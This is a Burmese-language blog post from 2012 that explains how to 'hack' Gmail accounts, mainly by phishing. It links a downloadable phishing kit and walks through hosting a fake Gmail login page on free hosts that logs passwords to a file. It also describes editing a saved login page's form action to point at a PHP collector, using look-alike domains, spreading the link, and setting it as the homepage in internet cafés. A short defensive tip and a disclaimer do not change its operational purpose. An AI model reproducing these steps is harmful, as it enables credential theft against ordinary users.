Pages

Tuesday, 31 July 2012

Gmail ကိုဟက္မယ္


 gmail ကိုဟက္လို႕တကယ္ရပါသလား။ရပါတယ္လို႕လဲ ေျပာလို႕ရပါတယ္။အဲ gmail ဟက္ခံရတယ္ဆိုတာ တကယ္ေတာ့ကိုယ့္အမွားက 90% ပါ ၀င္ပါတယ္။ဒီပို႕ကမသိေသးတဲသူေတြအတြက္ေဆာင္ ရန္ေရွာင္ရန္ အတြက္ပါ။ကၽြန္ေတာ္နည္းကေတာ့ 99% အလုပ္ျဖစ္ပါလိမ့္မယ္။ဒါေပမယ့္ ကိုယ္နပ္မွကိုယ္ရမွာပါ။

gmail hacking လုပ္မယ္ဆိုရင္
1.keylogger
2.Phishing method
3.cookies stealing
စတာေတြနဲ႕ လုပ္ရမွာပါ။
ဒီထဲမွာ အသံုးအမ်ားဆံုးကေတာ့ Phishing method ျဖစ္ပါတယ္။
Phishing method ဆိုတာ gmail login page အတုလုပ္တာပါ။
ေအာက္ပါလင့္ေန gmail phisher ေလးကိုေဒါင္းလိုက္ပါ။
http://www.ziddu.com/download/14956229/Gmail_Hacker_by_www.thepirat…
ျပးီရင္ free hosting site မွာ အေကာင့္တစ္ခုဖြင့္လိုက္ပါ။ေအာက္ေဖာ္ျပပါဆုိက္က ေတာ္ေတာ္သံုးရလြယ္ပါတယ္။
http://www.ripway.com
အဲဒီမွာအေကာင့္လုပ္ျပီး ခုနက ေဒါင္းထားတဲ့ ဖိုင္ ၃ ဖိုင္ကို upload လုပ္လိုက္ပါ။

ျပီးရင္ ေအာက္ပါအတိုင္းျမင္ရပါလိမ့္မယ္။

အေပၚဆံုးက http://h1.ripway.com/htetnyi/index.htm လင့္က သင့္ရဲ႕ gmail login အတု ျဖစ္ပါတယ္။

ကၽြန္ေတာ္ကေတာ့ ကၽြန္ေတာ္ ့gmail အေကာင့္နဲ႕စမ္းျပထားပါတယ္။ အဲဒီအတု စာမ်က္ႏွာမွာ login ၀င္ျပီးေတာ့စမ္းျပထားတာပါ။
အဲဒီလိုအေကာင့္၀င္ျပီးေတာ့ သင္ hosting တင္တားတဲ့ log.txt ဖိုင္ထဲမွာ ခုနက gmail login ၀င္ထားတဲ့ password ကိုျမင္ရပါလိမ့္မယ္။ log.txt ဖိုင္ေအာက္က edit ထဲကို၀င္ၾကည့္ပါ ။ ေအာက္မွာပံုနဲ႕ေဖာ္ျပထားပါတယ္။

ကဲ ဒါကိုဘယ္လိုေနရာမွသံုးမလဲ။
online ေပၚမွာဆိုရင္ ကိုယ့္ gmail အတု လင့္ကို သူမ်ားေတြကိုေပးျခင္း။
အင္တာနက္ ကဖီးေတြမွာဆိုရင္ firefox မွာ ကို့္လင့္ကို homepage ေပးထားျခင္းျဖင့္သံုးႏိုင္ပါတယ္

ဘယ္လိုကာကြယ္မလဲ အရင္ ဆံုး ကိုယ္ကေမးသံုးမယ္ဆို အရင္ ဆံုး site address ကို အရင္စစ္ပါ။
သူမ်ားေပးတဲ့လင့္တိုင္း မ၀င္ရ။
ကိုယ္၀င္လင့္တိုင္းကိုစစ္ေဆး ျခင္းျဖင့္အလြယ္တကူကာကြယ္ႏိူင္ပါတယ္။
ဒါကေနာက္ထပ္ဟို ့တခုမွာသူငယ္ခ်င္းတေယာက္တင္ထားတာေလးပါ ဗဟုသုတအျဖစ္ထည့္ေပးတာပါ..
000 webhosts မွာ အေကာင့္သြားလုပ္လိုက္ေလ။ FTP account.
ၿပီးရင္ html နဲ ့php ဖုိင္ကို upload လုပ္လိုက္။
အေကာင္းဆံုးနည္းလမ္းက -
- လက္ရွိ အသစ္ၿဖစ္သြားတဲ့ Gmail page ကို Save လုပ္လိုက္။
- ၿပီးရင္ Notepad နဲ ့ဖြင့္ၿပီး action ဆိုတဲ ့ေနရာမွာ ကို္ယ့္ ရဲ့ php ဖုိင္နာမည္ကို ထည့္လိုက္။
Example : <form id=”gaia_loginform” action=”explore.php” method=”post”>
(explore.php ဆုိတာက ကိုယ့္ရ့ဲ php ဖိုင္နာမည္ေပါ့)
- ေနာက္ၿပီးသြားရင္ FTP Server ရဲ့ Public_Html folder ေအာက္မွာ ServiceLogin.html, ServiceLogin_Files, explore.pho
သံုးခုကိုတင္လိုက္။
ဒါဆိုရၿပီ။ ကိုယ့္ Gmail page အတု လိပ္စာကို ေပးၿပီး သူ Sign In လုပ္မွာကို သာထိုင္ေစာင့္ေနေပေတာ့။
000webhost မွာတစ္ခုေကာင္းတာက Address က နည္းနည္း ဆင္တူရိုးမွားလုပ္လို ့ရတယ္။
ဥပမာေပးရရင္ ကၽြန္ေတာ့္ Phishing page က  
http://gmail-authentication.netai.net/ServiceLogin.htm/
(အဲ့မွာ သြားၿပီး ခင္ဗ်ား အေကာင့္ကိုရိုက္ထည့္လိုက္ရင္ က်ဳပ္ဆီ ေရာက္ၿပီေပါ့ဗ်ာ။ မယံုရင္ စမ္းၾကည့္ေလ
တစ္ခုေၿပာခ်င္တာက ဒီနည္းက လွည့္စားဖို ့၊ မသမာမႈေတြ လုပ္ဖို ့အတြက္ မရည္ရြယ္ပါဘူး။
မတတ္သာတဲ့ အေၿခအေနေတြမွာ သံုးဖို ့နဲ ့ကိုယ့္ကိုကိုယ္ ကာကြယ္ဖို ့ပဲရည္ရြယ္တာပါ။

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...

အေထြးေထြးနည္းပညာမ်ား